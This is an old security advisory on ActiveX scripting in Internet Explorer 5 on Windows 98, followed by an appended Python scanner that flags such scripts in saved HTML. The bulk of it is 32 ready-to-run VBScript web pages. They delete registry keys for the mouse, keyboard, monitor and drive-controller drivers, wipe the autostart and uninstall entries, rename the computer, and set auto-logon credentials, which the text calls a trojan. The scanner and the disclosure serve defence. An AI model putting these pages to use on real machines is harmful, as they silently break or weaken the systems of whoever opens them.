COMMAND
activex
SYSTEMS AFFECTED
Win98 (at least)
PROBLEM
Freddy Laplaine sent the following to Security Bugware. It
was tested with Windows 98 and IE5:
1] Write in the windows registry
2] Delete in the windows registry
3] Create a batch file
4] Create a shortcut on the desktop
5] Clean the menu Start-Execute
6] Mask network access
7] Disable the programs that run at autostart
8] mask the name of the last Windows user
9] Modify the computer name
10] delete the arrow on the shortcuts
11] refresh with F5 key
12] choose a minimum password length for winlogon session
13] disable Start-program-msdos
14] mask the file system button
15] delete the history for explorer
16] create a trojan in html with automatic login on windows98
17] delete mouse drivers
18] delete printer drivers
19] delete ports Com1-com2 drivers
20] delete keyboard drivers
21] delete modem
22] delete media controller
23] disable the monitor
24] disable the hard drive controller
25] Clean the cache folder of Netscape
26] delete NukeNabber
27] delete remote connection
28] close the menu start-find
29] close the menu start-document
30] close the menu start-execute
31] close the option start-shutdown
32] close the menu start-favorites
1] Write in the windows registry
================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\toto\With\Name", "it's a test"
</script>
</body>
</html>
2] Delete in the windows registry
=================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\toto\"
</script>
</body>
</html>
3] Create a batch file
======================
<html>
<body>
<script Language="VBScript">
if location.protocol = "file:" then
    Set FSO = CreateObject("Scripting.FileSystemObject")
    HPath = Replace(location.href, "/", "\")
    HPath = Replace(HPath, "file:\\\", "")
    HPath = FSO.GetParentFolderName(HPath)
    Set TRange = document.body.createTextRange
    Set BatFile = FSO.CreateTextFile("c:\Windows\toto.bat", 2, False)
    BatFile.WriteLine ""
    BatFile.WriteLine "bonjour"
    BatFile.Close
end if
</script>
</body>
</html>
4] Create a shortcut on the desktop
===================================
<html>
<body>
<script Language="VBScript">
if location.protocol = "file:" then
    Set WshShell = CreateObject("WScript.Shell")
    Set FSO = CreateObject("Scripting.FileSystemObject")
    HPath = Replace(location.href, "/", "\")
    HPath = Replace(HPath, "file:\\\", "")
    HPath = FSO.GetParentFolderName(HPath)
    Set TRange = document.body.createTextRange
    Set RealLink = WshShell.CreateShortcut("C:\WINDOWS\bureau\zataz.url")
    RealLink.TargetPath = "http://www.zataz.com/"
    RealLink.Save
end if
</script>
</body>
</html>
5] Clean the menu Start-Execute
===============================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"
</script>
</body>
</html>
6] Mask network access
======================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetupSecurityPage", 1, "REG_DWORD"
</script>
</body>
</html>
7] Disable the program who runs in the autostart
================================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
</script>
</body>
</html>
8] mask the last name of user windows
=====================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.Regwrite "HKEY_LOCAL_MACHINE\Network\Logon\DontShowLastUser", 0,"REG_DWORD"
</script>
</body>
</html>
9] Modify the computer name
===========================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName","caca"
</script>
</body>
</html>
10] delete the arrow on the shortcuts
=====================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\IsShortcut"
WshShell.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile\IsShortcut"
</script>
</body>
</html>
11] refresh with f5 key
=======================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Update"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Update", 0 ,"REG_DWORD"
</script>
</body>
</html>
12] choose a minimum size password for winlogon session
=======================================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Policies\Network\MinPwdLen",0,"REG_DWORD"
</script>
</body>
</html>
13] disable Start-program-msdos
===============================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
</script>
</body>
</html>
14] mask the file system button
===============================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Policies\System\NoFileSysPage",1,"REG_DWORD"
</script>
</body>
</html>
15] delete the history for explorer
===================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\RecentDocs\"
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\RunMru\"
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\Doc Find Spec MRU\"
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\explorer\FindComputerMRU\"
</script>
</body>
</html>
16] create a trojan in html with automatic login on windows98
=============================================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\DefaultUserName", "login"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\DefaultPassword", "password"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\AutoAdminLogon",1,"REG_DWORD"
</script>
</body>
</html>
17] delete mouse drivers
========================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Mouse\"
</script>
</body>
</html>
18] Delete printer
==================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Printer\"
</script>
</body>
</html>
19] Delete port Com1-com2
=========================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Ports\"
</script>
</body>
</html>
20] Delete keyboard
===================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Keyboard\"
</script>
</body>
</html>
21] Delete modem
================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Modem\"
</script>
</body>
</html>
22] Delete media controller
===========================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\MEDIA\"
</script>
</body>
</html>
23] Delete monitor
==================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Monitor\"
</script>
</body>
</html>
24] Delete the hard drive controller
====================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\PCMIA\"
</script>
</body>
</html>
25] Clean the cache directory for netscape
==========================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\Cache"
</script>
</body>
</html>
26] delete NukeNabber
=====================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\Sofware\NukeNabber 7.0"
</script>
</body>
</html>
27] delete the remote connections
=================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete "HKEY_CURRENT_USER\RemoteAccess"
</script>
</body>
</html>
28] close the menu start-find
=============================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", 0 ,"REG_DWORD"
</script>
</body>
</html>
29] close the menu start-document
=================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu", 0 ,"REG_DWORD"
</script>
</body>
</html>
30] close the menu start-execute
================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", 0 ,"REG_DWORD"
</script>
</body>
</html>
31] close the options start-shutdown
====================================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", 0 ,"REG_DWORD"
</script>
</body>
</html>
32] close the menu -Favorites
=============================
<html>
<body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu", 0 ,"REG_DWORD"
</script>
</body>
</html>
SOLUTION
Well, you don't have to know French or any other language to know
the following rule: SHUT DOWN ACTIVEX!
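
Every page above follows one pattern: a script block creates WScript.Shell or Scripting.FileSystemObject and then calls a registry or file method on it. The static check below flags that pattern in saved HTML without running any of it; it is an added example, not part of the original advisory, and scan_html, the regex names and both sample pages are assumptions constructed here.

```python
import re

# Automation objects that the pages in this advisory create from script.
RISKY_PROGIDS = {"wscript.shell", "scripting.filesystemobject"}

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
CREATE_RE = re.compile(r'CreateObject\s*\(\s*"([^"]+)"', re.I)
# \s* also covers a missing space or a line break between method and argument.
REG_RE = re.compile(r'\.\s*(RegWrite|RegDelete)\s*"([^"]+)"', re.I)
FILE_RE = re.compile(r'\.\s*(CreateTextFile|CreateShortcut)\s*\(\s*"([^"]+)"', re.I)


def scan_html(html):
    """Return one finding per <script> block that drives a risky object."""
    findings = []
    for body in SCRIPT_RE.findall(html):
        progids = sorted({p.lower() for p in CREATE_RE.findall(body)} & RISKY_PROGIDS)
        if not progids:
            continue
        hits = list(REG_RE.finditer(body)) + list(FILE_RE.finditer(body))
        hits.sort(key=lambda m: m.start())
        actions = [(m.group(1).lower(), m.group(2)) for m in hits]
        findings.append({"progids": progids, "actions": actions})
    return findings


# Constructed sample: reuses only the harmless test key from item 1.
SAMPLE_FLAGGED = r'''<html><body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.Regwrite"HKEY_LOCAL_MACHINE\toto\With\Name", "it's a test"
WshShell.RegDelete
"HKEY_LOCAL_MACHINE\toto\"
</script></body></html>'''

# Constructed sample: ordinary page script that creates no automation object.
SAMPLE_BENIGN = '''<html><body>
<script Language="VBScript">
document.write "hello"
</script></body></html>'''

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_FLAGGED):
        print(finding["progids"])
        for verb, target in finding["actions"]:
            print(" ", verb, target)
```

A finding lists the objects created and the registry keys or file paths the script names, which is enough to triage a saved page or mail attachment before anyone opens it in a browser.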